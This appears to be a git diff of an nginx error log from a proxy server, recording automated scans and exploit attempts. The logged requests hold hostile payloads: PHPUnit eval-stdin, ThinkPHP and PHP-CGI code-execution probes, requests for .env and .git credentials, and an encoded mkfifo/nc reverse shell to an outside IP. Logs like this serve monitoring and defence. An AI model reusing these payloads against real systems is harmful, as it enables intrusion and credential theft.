"222.117.41.51:80" -2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:34 [error] 962#962: *100695 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:34 [error] 962#962: *100695 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:36 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:36 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:45 [error] 962#962: *100695 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:46 [error] 962#962: *100695 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 15:06:35 [error] 962#962: *100697 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 45.148.10.246, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+144.172.73.168+9898+%3E%2Ftmp%2Ff) HTTP/1.1", host: "222.117.41.51" -2026/02/18 15:26:06 [error] 962#962: *100704 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 144.79.133.252, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:02:07 [error] 961#961: *100767 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:21 [error] 963#963: *100770 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 17:17:25 [error] 963#963: *100773 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "222.117.41.51" -2026/02/18 17:55:39 [error] 963#963: *100791 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 85.11.167.7, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/18 18:49:16 [error] 979#979: *100805 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 19:48:55 [error] 972#972: *100824 open() "/var/www/html/ip" failed (2: No such file or directory), client: 87.121.84.172, server: localhost-nginx-proxy-manager, request: "GET http://httpbin.org/ip HTTP/1.1", host: "httpbin.org" -2026/02/18 20:24:48 [error] 973#973: *100856 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 21:03:20 [error] 979#979: *102465 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80" +2026/02/19 00:48:14 [error] 992#992: *104509 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/19 01:01:17 [error] 985#985: *104536 open() "/var/www/html/mcp" failed (2: No such file or directory), client: 45.156.129.65, server: localhost-nginx-proxy-manager, request: "POST /mcp HTTP/1.1", host: "222.117.41.51" +2026/02/19 01:01:17 [error] 985#985: *104536 open() "/var/www/html/sse" failed (2: No such file or directory), client: 45.156.129.65, server: localhost-nginx-proxy-manager, request: "GET /sse HTTP/1.1", host: "222.117.41.51" +2026/02/19 02:38:24 [error] 990#990: *107859 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 40.119.33.98, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51" +2026/02/19 03:16:18 [error] 992#992: *108082 open() "/var/www/html/login" failed (2: No such file or directory), client: 104.164.8.29, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51:80" +2026/02/19 03:25:01 [error] 992#992: *108112 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/19 03:43:40 [error] 992#992: *108174 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "222.117.41.51" +2026/02/19 03:49:45 [error] 985#985: *108253 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.178.110.18, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" diff --git a/npm/data/logs/letsencrypt-requests_access.log 